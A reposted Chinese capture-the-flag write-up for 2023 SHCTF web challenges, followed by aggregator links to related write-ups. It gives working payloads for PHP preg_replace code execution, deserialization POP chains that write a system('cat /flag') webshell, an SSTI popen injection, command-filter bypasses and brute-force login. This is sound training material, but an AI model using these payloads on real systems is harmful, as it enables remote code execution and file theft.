2023SHCTF web方向wp

这篇具有很好参考价值的文章主要介绍了2023SHCTF web方向wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.ezphp

2023SHCTF web方向wp,前端,安全,网络安全

看一眼,你大爷,啥玩意都给我过滤完了。

还好下面有preg_replace()/e,会把replacement当作php语句执行

传参pattern=.*, .*表示任意字符,code={${phpinfo()}} ,为什么这样写,因为,'print_r("\\1")',如果直接传phpinfo(),会被当作字符串对待,而php中{}里面的变量会被解析,这样就能执行phpinfo(),本来一直尝试文件读取,结果flag就在phpinfo里面。

2.sseerriiaalliizzee

2023SHCTF web方向wp,前端,安全,网络安全

用伪协议

php://filter/string.strip_tags|convert.base64-decode/resource=6.php

<?php @eval(system('cat /flag'));?>进行 base64编码然后拼接到后面

payload:

<?php

class Start{

    public $barking;



    public function __toString(){

            return $this->barking->dosomething();

    }

}



class CTF{

    public $part1="php://filter/string.strip_tags|convert.base64-decode/resource=6.php";

    public $part2='IDw/cGhwIEBldmFsKHN5c3RlbSgnY2F0IC9mbGFnJykpOz8+';



   

    public function dosomething(){

        $useless   = '<?php die("+Genshin Impact Start!+");?>';

        $useful= $useless. $this->part2;

        file_put_contents($this-> part1,$useful);

    }

}



class Flag{

    public function dosomething(){

        include('./flag.php');

        return "barking for fun!";

       

    }

}

$a=new Start;

$a->barking=new CTF;

echo serialize($a);

3.md5的事就拜托了

2023SHCTF web方向wp,前端,安全,网络安全

这题考的是md5长度拓展攻击。

parse_url()函数: PHP 内置函数之一,用于解析 URL 字符串,将其拆分为不同的组成部分,可以获取协议、主机名、端口号、路径、查询参数等信息。

构造SHCTF,让回显flagmd5

SHCTF=host://SHCTF:pass@user/path?args=value#anch

2023SHCTF web方向wp,前端,安全,网络安全

md5值为 c3ef7d5c6edf7d0495b0d8b92fe3241a

然后构造length输出flag 长度,用小数绕过intval

2023SHCTF web方向wp,前端,安全,网络安全

长度为42,下面是关键部分

2023SHCTF web方向wp,前端,安全,网络安全

把$num urldecode之后拼接在flag后面md5加密,然后要与POST的SHCTF相等

这里考察md5长度拓展攻击,用工具

2023SHCTF web方向wp,前端,安全,网络安全

2023SHCTF web方向wp,前端,安全,网络安全

获得flag flag{f92d1d13-0947-4212-bf78-269c400606a0}

4.babyrce

2023SHCTF web方向wp,前端,安全,网络安全

简单的绕过正则匹配,\拼接,$IFS绕过空格

payload:rce=ca\t$IFS/f\lag

2023SHCTF web方向wp,前端,安全,网络安全

5.ezphp

2023SHCTF web方向wp,前端,安全,网络安全

num不能有数字但是得通过intval(),这里用数组绕过?num[]=1

下面一个绕过,需要code里面有SHCTF,但是SHCTF前面又不能有东西,这里用回溯绕过

脚本

import  requests
data={"c_ode":'2023'*260000+'SHCTF'}
url='http://112.6.51.212:30302/?num[]=1'
res=requests.post(url=url,data=data,allow_redirects=False)
print(res.text)

2023SHCTF web方向wp,前端,安全,网络安全

6.ez_serialize

2023SHCTF web方向wp,前端,安全,网络安全

简单的反序列化pop链

_wakeup->_tostring->__get->invoke

payload:

$a=new B;
$a->q=new C;
$a->q->z=new D;
$a->q->z->p=new A;
$a->q->z->p->var_1='php://filter/read=convert.base64-encode/resource=flag.php';
echo serialize($a);

2023SHCTF web方向wp,前端,安全,网络安全

7.登录就给flag

2023SHCTF web方向wp,前端,安全,网络安全

用bp爆破一下就得到密码password,直接登录

2023SHCTF web方向wp,前端,安全,网络安全

8.生成你的邀请函吧

2023SHCTF web方向wp,前端,安全,网络安全

用postman发送json请求

2023SHCTF web方向wp,前端,安全,网络安全

9.serialize

2023SHCTF web方向wp,前端,安全,网络安全

正常的pop链,注意一下php序列化里面的指针用法,把$gao的地址写到$a上

__wakeup->__get->__tostring

注意序列化字符串不能以O:开头,所以我们序列化的时候转化成数组再序列化就可以绕过了

payload:

<?php
class misca{
    public $gao;
    public $fei;
    public $a;
}
class musca{
    public $ding;
    public $dong;

}
class milaoshu{
    public $v;

}
$a=new musca;
$a->ding=new misca;
$a->ding->a='aa';
$a->ding->gao=&$a->ding->a;
$a->ding->fei=new milaoshu;
$a->ding->fei->v='php://filter/read=convert.base64-encode/resource=flag.php';
echo serialize(array($a));

2023SHCTF web方向wp,前端,安全,网络安全

10.no_wake_up

2023SHCTF web方向wp,前端,安全,网络安全

依然是反序列化,目的绕过__wakeup。

属性个数与实际属性个数不同就会绕过__wakeup。

payload

<?php
class flag{
    public $username='admin';
    public $code='php://filter/read=convert.base64-encode/resource=flag.php';
    public function __wakeup(){
        $this->username = "guest";
    }
    public function __destruct(){
        if($this->username = "admin"){
            include($this->code);
        }
    }
}
$a=new flag;
echo serialize($a);
序列化得到
O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
把2改为3得到flag

2023SHCTF web方向wp,前端,安全,网络安全

11.ez_ssti

2023SHCTF web方向wp,前端,安全,网络安全

ssti注入,hello后面应该跟的是名字,盲猜参数名是name

2023SHCTF web方向wp,前端,安全,网络安全

很成功,开始构造语句

payload:

?name={{%27%27.__class__.__base__.__subclasses__()[132].__init__.__globals__[%27popen%27](%27cat /flag%27).read()}}

没有任何过滤

2023SHCTF web方向wp,前端,安全,网络安全

12.EasyCMS

后台扫描得到登录地址/admin/admin.php

2023SHCTF web方向wp,前端,安全,网络安全

默认用户名admin 密码tao

2023SHCTF web方向wp,前端,安全,网络安全

这里存在任意文件读取漏洞,可以读取到根目录的flag文件

2023SHCTF web方向wp,前端,安全,网络安全文章来源地址https://www.toymoban.com/news/detail-742108.html

到了这里,关于2023SHCTF web方向wp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [第七届蓝帽杯全国大学生网络安全技能大赛 蓝帽杯 2023]——Web方向部分题 详细Writeup

    你真的熟悉PHP吗? 源码如下 首先要先解决传参 my_secret.flag 根据php解析特性,如果字符串中存在 [、. 等符号,php会将其转换为 _ 且只转换一次 ,因此我们直接构造 my_secret.flag 的话,最后php执行的是 my_secret_flag ,因此我们将前面的 _ 用 [ 代替,也就是传参的时候传参为 my[s

    2024年02月10日
    浏览(43)
  • 2023年春秋杯网络安全联赛 春季赛 wp

    第一部分求解一下pell函数得到x,y 直接使用二项式展开定理即可还原flag 可以直接将z表示出来然后就能求解key了 1day,一个SQL注入改管理员的密码。 payload: 然后计划任务执行读取flag或者反弹shell即可。 上来扫到了dowload目录,然后pyc反编译得到源码。 在numpy.loads存在pickle反序

    2024年02月13日
    浏览(42)
  • LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分

    由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。 NSSCTF平台:https://www.nssctf.cn/ PS:记得所有的 flag 都改为 NSSCTF或者LitCTF 我Flag呢? 奇怪,放哪里了,怎么看不见呢?(初级难度) 直接 F12

    2024年02月05日
    浏览(50)
  • 2023 SHCTF-校外赛道 MISC WP

    提示:k1sme4的朋友考到了一所在k1sme4家附近的大学,一天,k1sme4的朋友去了学校对面的商场玩,并给k1sme4拍了一张照片,你能找到他的学校吗? flag格式:flag{xx省_xx市_xx区_xx大学} 搜索:一家幸运好玩的店,还有万达 搜索到https://www.lottery.gov.cn/xwzx/hy/20220513/10017006.html

    2024年02月08日
    浏览(37)
  • 软件工程学术顶会——ICSE 2023 议题(网络安全方向)清单与摘要

    按语:IEEE/ACM ICSE全称International Conference on Software Engineering,是软件工程领域公认的旗舰学术会议,中国计算机学会推荐的A类国际学术会议,Core Conference Ranking A*类会议,H5指数74,Impact score 11.55。2023年完整的议题清单参考此处:https://conf.researchr.org/program/icse-2023/program-icse-20

    2024年02月16日
    浏览(60)
  • [LitCTF2023] web方向全题解wp

    签到题,f12获取flag 这里注意看一下源代码,有彩蛋 先留着 前端js小游戏 开调试器进行代码审计 可知当游戏进入 finished 状态的时候会得到flag,可以直接找到 传参题,按照要求传参直接出 传入得到flag,然后提示备份文件还有好恰的,备份文件无非几种,直接访问 www.zip 下载

    2024年02月06日
    浏览(37)
  • (2023版)零基础入门网络安全/Web安全,收藏这一篇就够了

    由于我之前写了不少网络安全技术相关的文章和回答,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人私信问我: 我刚入门网络安全,该怎么学? 要学哪些东西? 有哪些方向? 怎么选? 这一行职业前景如何? 废话不多说,先上一张图镇楼,看看网络安全有

    2024年02月07日
    浏览(72)
  • web大前端面试——浏览器、网络和安全

    (1).DNS解析 当我们在浏览器中输入一个域名的时候,例如www.mi.com,这个域名只是与IP地址的一个映射,这时DNS解析就要充当一个翻译的角色,把域名解析成真实的IP地址。所以DNS解析的过程实际上就是将域名还原成真实IP地址的过程。 DNS的解析又分为以下几个步骤: 1.浏览器会

    2024年02月03日
    浏览(42)
  • 2023年广东省网络安全竞赛——Web 渗透测试解析(超级详细)

    任务环境说明: √ 服务器场景:Server03 √ 服务器场景操作系统:未知(关闭连接) 通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag 提交(如:点击超链接查看上传文

    2023年04月08日
    浏览(54)
  • DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp

    源码直接给了 Ctrl+U查看带缩进的源码 登录的账号密码是 json格式 的POST请求。 审计题目源码,发现他最后会回显当前目录文件的内容(就是源码),我们可以修改全局变量 __file__ ,从而造成任意文件读取。 解法一: 题中源码有merge()函数,我们考虑python原型链污染。 参考:

    2024年02月14日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包